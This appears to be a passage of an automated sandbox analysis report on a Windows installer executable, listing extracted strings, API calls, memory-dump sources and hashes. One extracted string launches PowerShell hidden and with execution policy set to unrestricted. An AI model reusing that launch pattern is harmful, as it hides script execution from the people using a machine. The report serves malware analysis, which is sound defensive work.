                                                    • Unable to get a temp file for script output, temp path: , xrefs: 004A6BAF
                                                    • <3[, xrefs: 004A6DA3
                                                    • Unable to retrieve PowerShell output from file: , xrefs: 004A6DFE
                                                    • Unable to create process: , xrefs: 004A6CA4
                                                    • txt, xrefs: 004A6B73
                                                    • Unable to find file , xrefs: 004A6AD3
                                                    • Unable to retrieve exit code from process., xrefs: 004A6E21
                                                    • ps1, xrefs: 004A6B46, 004A6B58, 004A6B62
                                                    • powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new, xrefs: 004A6BFF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: <3[$Unable to create process: $Unable to find file $Unable to get a temp file for script output, temp path: $Unable to retrieve PowerShell output from file: $Unable to retrieve exit code from process.$powershell.exe -NonInteractive -NoLogo -ExecutionPolicy Unrestricted -WindowStyle Hidden -Command "$host.UI.RawUI.BufferSize = new$ps1$txt
                                                    • API String ID: 0-3121538646

                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(0063C5D0,D13B3340,00000000), ref: 00476363
                                                    • EnterCriticalSection.KERNEL32(0063C5D0,D13B3340), ref: 00476378
                                                    • GetCurrentProcess.KERNEL32 ref: 00476385
                                                    • GetCurrentThread.KERNEL32 ref: 00476393
                                                    • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,00000000), ref: 0047642D
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00476434
                                                    • __Init_thread_footer.LIBCMT ref: 00476448
                                                    • GetModuleHandleW.KERNEL32(00000000,*** Stack Trace (x86) ***,0000001F,?,?,?,00000000), ref: 0047667E
                                                    • LeaveCriticalSection.KERNEL32(0063C5D0,?,00000000), ref: 004767BC
                                                    Similarity
                                                    • API ID: CriticalSection$Current$AddressEnterHandleInit_thread_footerInitializeLeaveLibraryLoadModuleProcProcessThread
                                                    • String ID: *** Stack Trace (x86) ***$<--------------------MORE--FRAMES-------------------->$Dbghelp.dll$MODULE_BASE_ADDRESS$SymFromAddr$[0x%.8Ix]
                                                    • API String ID: 1326996155-80696534

                                                    APIs
                                                      • Part of subcall function 004B3820: LoadLibraryW.KERNEL32(Advapi32.dll,D13B3340), ref: 004B38B1
                                                      • Part of subcall function 004B3820: GetLastError.KERNEL32 ref: 004B38DF
                                                    • LocalFree.KERNEL32(00000000,Everyone,10000000,00000000,D13B3340), ref: 004A0AE2
                                                    • LocalFree.KERNEL32(00000000,Everyone,10000000,00000000,D13B3340), ref: 004A0AF3
                                                    • LocalAlloc.KERNEL32(00000040,00000014), ref: 004A0B68
                                                    • GetLastError.KERNEL32 ref: 004A0B86
                                                    • LocalFree.KERNEL32(00000000), ref: 004A0B97
                                                    • GetLastError.KERNEL32 ref: 004A0BB6
                                                    • LocalFree.KERNEL32(00000000), ref: 004A0BC7
                                                    • CreateDirectoryW.KERNEL32(?,?), ref: 004A0BF0
                                                    • LocalFree.KERNEL32(00000000,Everyone,10000000,00000000,D13B3340), ref: 004A0C44
                                                    • LocalFree.KERNEL32(00000000,Everyone,10000000,00000000,D13B3340), ref: 004A0CA7
                                                    • LocalFree.KERNEL32(00000000,Everyone,10000000,00000000,D13B3340), ref: 004A0CB1
                                                    Similarity
                                                    • API ID: Local$Free$ErrorLast$AllocCreateDirectoryLibraryLoad
                                                    • String ID: Everyone$qT$qT
                                                    • API String ID: 1481213927-1031658294
                                                    • Opcode ID: 1b7a27d488e076ca6f74dde7ba9c20d720c8f6e608506bbd404fc79ce0351372
                                                    • Instruction ID: 2ea31a23f4b7ba6ae430a7810908f153f2d4eb701c15a2884907bb3a0b5e9ec9
                                                    • Opcode Fuzzy Hash: 1b7a27d488e076ca6f74dde7ba9c20d720c8f6e608506bbd404fc79ce0351372
                                                    • Instruction Fuzzy Hash: BF913BB1E01209ABEF14DFE5D998B9FBBB8BF15304F14411AE401AB390DB799904CF95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryW.KERNEL32(Advapi32.dll,D13B3340), ref: 004B38B1
                                                    • GetLastError.KERNEL32 ref: 004B38DF
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    • GetProcAddress.KERNEL32(00000000,ConvertStringSidToSidW), ref: 004B38F5
                                                    • FreeLibrary.KERNEL32(00000000), ref: 004B390E
                                                    • GetLastError.KERNEL32 ref: 004B391B
                                                    • GetLastError.KERNEL32 ref: 004B3B09
                                                    • GetLastError.KERNEL32 ref: 004B3B6E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$Library$AddressAllocateFreeHeapLoadProc
                                                    • String ID: Advapi32.dll$ConvertStringSidToSidW
                                                    • API String ID: 3460774402-1129428314
                                                    • Opcode ID: 37ce0a12e9305e2f8672961cb5c4bdf4891a33276d2d3d9c4765be6c5fe347c6
                                                    • Instruction ID: 01abaedab528f04e769ce9957673bcb93348667d7a157c5942f85a9d652e940d
                                                    • Opcode Fuzzy Hash: 37ce0a12e9305e2f8672961cb5c4bdf4891a33276d2d3d9c4765be6c5fe347c6
                                                    • Instruction Fuzzy Hash: 73F18BB1D01209AFDF10DF95D945BEEBBB4FF05311F20421AE914B7280E778AA49CBA5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • InitializeCriticalSection.KERNEL32(006394D0,D13B3340,?,00000010), ref: 0049F92C
                                                      • Part of subcall function 0035A140: FindResourceW.KERNEL32(00000000,?,00000006,?,?,000000A0,80070057,8007000E,80004005,00371A24,00000000,?,?,?,*.*), ref: 0035A163
                                                    • EnterCriticalSection.KERNEL32(00000010,D13B3340,?,00000010), ref: 0049F939
                                                    • WriteFile.KERNEL32(00000000,?,?,000000FF,00000000), ref: 0049F96B
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,000000FF,00000000), ref: 0049F974
                                                    • WriteFile.KERNEL32(00000000,00495687,94D0B9EC,00591D8D,00000000,005B326C,00000001,?,?,000000FF,00000000), ref: 0049F9F6
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,000000FF,00000000), ref: 0049F9FF
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0049FA35
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0049FA3E
                                                    • WriteFile.KERNEL32(00000000,?,?,?,00000000,005B5F2C,00000002,?,?,?,00000000,?,?,000000FF,00000000), ref: 0049FA9F
                                                    • FlushFileBuffers.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0049FAA8
                                                    • LeaveCriticalSection.KERNEL32(00000000,?,?,?,00000000,?,?,000000FF,00000000), ref: 0049FAD8
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: File$BuffersFlushWrite$CriticalSection$AllocateEnterFindHeapInitializeLeaveResource
                                                    • String ID: ,_[$l2[
                                                    • API String ID: 201293332-1480465998
                                                    • Opcode ID: b5539c806606ca5d8e90294acab5cacba9991b0b2a8976695763b6dd7b2b1cc3
                                                    • Instruction ID: 1187ecadc61af52c037603bdc814a98fd049b0b133553bd517c36a71be2047e3
                                                    • Opcode Fuzzy Hash: b5539c806606ca5d8e90294acab5cacba9991b0b2a8976695763b6dd7b2b1cc3
                                                    • Instruction Fuzzy Hash: 6A619D70900644EFDB01DF68DD49BAABFB4FF15310F148169F805E72A1DB74A918DBA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,D13B3340), ref: 0048A4F9
                                                    • IsWow64Process.KERNEL32(00000000), ref: 0048A500
                                                      • Part of subcall function 0046C2F0: _wcsrchr.LIBVCRUNTIME ref: 0046C329
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0048A581
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0048A617
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: _wcsrchr$Process$CurrentWow64
                                                    • String ID: "%s" $ /fvomus //$ /i //$ /p //$ EXE_CMD_LINE="%s "$ TRANSFORMS=":%d"$%s AI_SETUPEXEPATH="%s" SETUPEXEDIR="%s"$.x64
                                                    • API String ID: 657290924-2074823060
                                                    • Opcode ID: d87f7846e5b6d78904ea2ddaa2ad49903afd4d9b9e2c9c8a515f0b5d8c7bcd52
                                                    • Instruction ID: dd387a632a84e0ce26ab48c601ea4cecfd262dda576224bf4abf009c2ec9d3cb
                                                    • Opcode Fuzzy Hash: d87f7846e5b6d78904ea2ddaa2ad49903afd4d9b9e2c9c8a515f0b5d8c7bcd52
                                                    • Instruction Fuzzy Hash: EBF1E531A006059FEB00EF68C844BAEBBB5BF45314F18866EE815AB3D1DB78DD04CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,00000043), ref: 0038B328
                                                    • GetProcAddress.KERNEL32(00000000,InitializeEmbeddedUI), ref: 0038B341
                                                    • GetProcAddress.KERNEL32(00000043,ShutdownEmbeddedUI), ref: 0038B34D
                                                    • GetProcAddress.KERNEL32(00000043,EmbeddedUIHandler), ref: 0038B35A
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$HeapInit_thread_footer$AllocateLibraryLoadProcess
                                                    • String ID: build $20.2$2c3f1cf9$EmbeddedUIHandler$INAN$InitializeEmbeddedUI$SELECT `Data` FROM `Binary` WHERE `Name` = 'InstallerAnalytics.dll'$ShutdownEmbeddedUI
                                                    • API String ID: 2564778481-3504904618
                                                    • Opcode ID: e463315bda655802bda822a13669695585ed6b10bbf7a0b4ec2074e979d9028f
                                                    • Instruction ID: 2764d0fbbe562a088b7e4ff52cb18d64088b123dcd828ff611466e84947d3100
                                                    • Opcode Fuzzy Hash: e463315bda655802bda822a13669695585ed6b10bbf7a0b4ec2074e979d9028f
                                                    • Instruction Fuzzy Hash: 8BD1B271D0070A9FDB15EFA8CC45BEEBBB4FF44310F144669E915AB291EB74AA04CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory,D13B3340,005CADDC,?,?,?,?,?,?,?,?,?,?,?,D13B3340), ref: 0035EEFB
                                                    • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 0035EF01
                                                    • LoadLibraryW.KERNEL32(?,.dll,-00000001,00000000,005B329C,00000000,00000000,00000000), ref: 0035F08B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$AddressProc
                                                    • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                    • API String ID: 1469910268-2454113998
                                                    • Opcode ID: 24d0f838a3010f917da8437d34494ce82adf6a99deae6880f5bfece7755a6ac1
                                                    • Instruction ID: 53086d2d0b1ff5c85fe9d6ebd93a8a55273a700d60bf6fa4b65f7cf170ade7b8
                                                    • Opcode Fuzzy Hash: 24d0f838a3010f917da8437d34494ce82adf6a99deae6880f5bfece7755a6ac1
                                                    • Instruction Fuzzy Hash: 7AB17071D04209DFDB16DFA8D845FEEBBB5FF48311F154129E811A72A1DB70AA48CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadLibraryW.KERNEL32(combase.dll,RoGetActivationFactory), ref: 0035E62E
                                                    • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 0035E634
                                                    • LoadLibraryW.KERNEL32(combase.dll,CoIncrementMTAUsage,?,?), ref: 0035E667
                                                    • GetProcAddress.KERNEL32(00000000,combase.dll), ref: 0035E66D
                                                    • LoadLibraryW.KERNEL32(?,.dll,00000004,-00000001,00000000,005B329C,00000000,00000000,00000000), ref: 0035E78D
                                                    • GetProcAddress.KERNEL32(00000000,DllGetActivationFactory), ref: 0035E7D6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressLibraryLoadProc
                                                    • String ID: .dll$CoIncrementMTAUsage$DllGetActivationFactory$RoGetActivationFactory$combase.dll
                                                    • API String ID: 2574300362-2454113998
                                                    • Opcode ID: ee2650f39ad9f2de7fd6b2c8b51a49e5099248134330a130398e7d94e543cdcd
                                                    • Instruction ID: fd2902a999c45727c501acf36df0afebb47ab69efffd9e262033020c3fa43cc1
                                                    • Opcode Fuzzy Hash: ee2650f39ad9f2de7fd6b2c8b51a49e5099248134330a130398e7d94e543cdcd
                                                    • Instruction Fuzzy Hash: 81917031D00209DFDF1ADFA8C895FEDBBB5BF58701F254129E811A72A1DB74AA48CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ParentWindowlstrcmp
                                                    • String ID: #32770
                                                    • API String ID: 3676684576-463685578
                                                    • Opcode ID: ac9a1682a7b00c74226c5a56e6167a539ad12fbdf8a868dd4fe442306b5a6fd3
                                                    • Instruction ID: b466ae4c7392c32d27114b610401e6c9d3605287e270381a93bdcd347dd0c4cc
                                                    • Opcode Fuzzy Hash: ac9a1682a7b00c74226c5a56e6167a539ad12fbdf8a868dd4fe442306b5a6fd3
                                                    • Instruction Fuzzy Hash: A7029F70A04208EFDB16CFA4C948FAEBBF5FF49718F148558F405AB2A4DB75A944CB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 004965B0: GetSystemDefaultLangID.KERNEL32(D13B3340,0000004C,?,00000048,?), ref: 004965E6
                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,?,?,?,?,00000000), ref: 0047B1E3
                                                    • GetProcAddress.KERNEL32(00000000), ref: 0047B1EA
                                                    • __Init_thread_footer.LIBCMT ref: 0047B201
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,00000000), ref: 0047B220
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: AddressCurrentDefaultHandleInit_thread_footerLangModuleProcProcessSystem
                                                    • String ID: IsWow64Process2$Not selected for install.$Search result:$Searching for:$Undefined$Wrong OS or Os language for:$kernel32
                                                    • API String ID: 52476621-4272450043
                                                    • Opcode ID: dd95b959f237a3f6a14a8c8572b9157c36130adf7df5c62ffe1d2598d2c0978c
                                                    • Instruction ID: 64b86892f7c012c8b2fb4922af424784fb9dabff4c668e8cdcb1f2a5282814d8
                                                    • Opcode Fuzzy Hash: dd95b959f237a3f6a14a8c8572b9157c36130adf7df5c62ffe1d2598d2c0978c
                                                    • Instruction Fuzzy Hash: 57F1A170900604DFDB10DFA9C994BAEBBB1FF44314F14825EE41AAB391DB39A846CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,tooltips_class32,00000000,80000063,80000000,80000000,80000000,80000000,?,00000000,00000000,D13B3340), ref: 00385288
                                                      • Part of subcall function 003672B0: SetWindowLongW.USER32(?,000000FC,00000000), ref: 003672E6
                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 0038538B
                                                    • SendMessageW.USER32(00000000,00000439,00000000,0000002C), ref: 0038539F
                                                    • SendMessageW.USER32(00000000,00000421,00000003,?), ref: 003853B4
                                                    • SendMessageW.USER32(00000000,00000418,00000000,0000012C), ref: 003853C9
                                                    • SendMessageW.USER32(?,000000D6,-00000001,00000000), ref: 003853E0
                                                    • GetWindowRect.USER32(?,?), ref: 00385412
                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00385474
                                                    • SendMessageW.USER32(00000000,00000411,00000001,0000002C), ref: 00385484
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window$CreateLongRect
                                                    • String ID: ,$tooltips_class32
                                                    • API String ID: 1954517558-3856767331
                                                    • Opcode ID: 764643ce795d52fac6647dcf36d9169c5c5222a7e347f64545254d8d19ffb554
                                                    • Instruction ID: 1851afeb0524c71726f0c1289297c01fc4f0d660b96e4b2b8c71a7ba5e552d0c
                                                    • Opcode Fuzzy Hash: 764643ce795d52fac6647dcf36d9169c5c5222a7e347f64545254d8d19ffb554
                                                    • Instruction Fuzzy Hash: 039121B1A00308AFDB15DFA5CC95BAEBBF9FB48700F10852AF516EA691D774A904CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • EnterCriticalSection.KERNEL32(0063E7BC,D13B3340,00000000,?,?,?,?,?,?,>R6,0054B23D,000000FF), ref: 00365A4D
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00365AC8
                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00365B6E
                                                    • LeaveCriticalSection.KERNEL32(0063E7BC), ref: 00365BC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CriticalCursorLoadSection$EnterLeave
                                                    • String ID: 0$>R6$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST$xS[
                                                    • API String ID: 3727441302-534179103
                                                    • Opcode ID: 894f8fe736f40fefaff207546356a474d38269db4b6d4f84846084eb2c37ec0c
                                                    • Instruction ID: 42cbee053a269e4da8cade0d11c39600db99aa0e9ffffb4b59bb4cc72973745c
                                                    • Opcode Fuzzy Hash: 894f8fe736f40fefaff207546356a474d38269db4b6d4f84846084eb2c37ec0c
                                                    • Instruction Fuzzy Hash: AD5102B0C053199FDB11CFA4D848BEEBFF9BF08314F14416AE404B7290DBB56A048BA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003C99B7
                                                    • GetParent.USER32 ref: 003C99CD
                                                    • GetWindowRect.USER32(00000000,?), ref: 003C99D8
                                                    • GetParent.USER32(00000000), ref: 003C99E0
                                                    • GetWindow.USER32(?,00000004), ref: 003C9A12
                                                    • GetWindowRect.USER32(00000000,?), ref: 003C9A20
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 003C9A2D
                                                    • MonitorFromWindow.USER32(00000000,00000002), ref: 003C9A45
                                                    • GetMonitorInfoW.USER32(00000000,00000000), ref: 003C9A5F
                                                    • SetWindowPos.USER32(?,00000000,?,?,000000FF,000000FF,00000015,?,00000004), ref: 003C9B0D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                     • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$LongMonitorParentRect$FromInfo
                                                    • String ID:
                                                    • API String ID: 1820395375-0
                                                    • Opcode ID: eb770c94da59cce8c7f026b3e7840fcd5a3ec8b5b2dcce5e66222e3bc4469f49
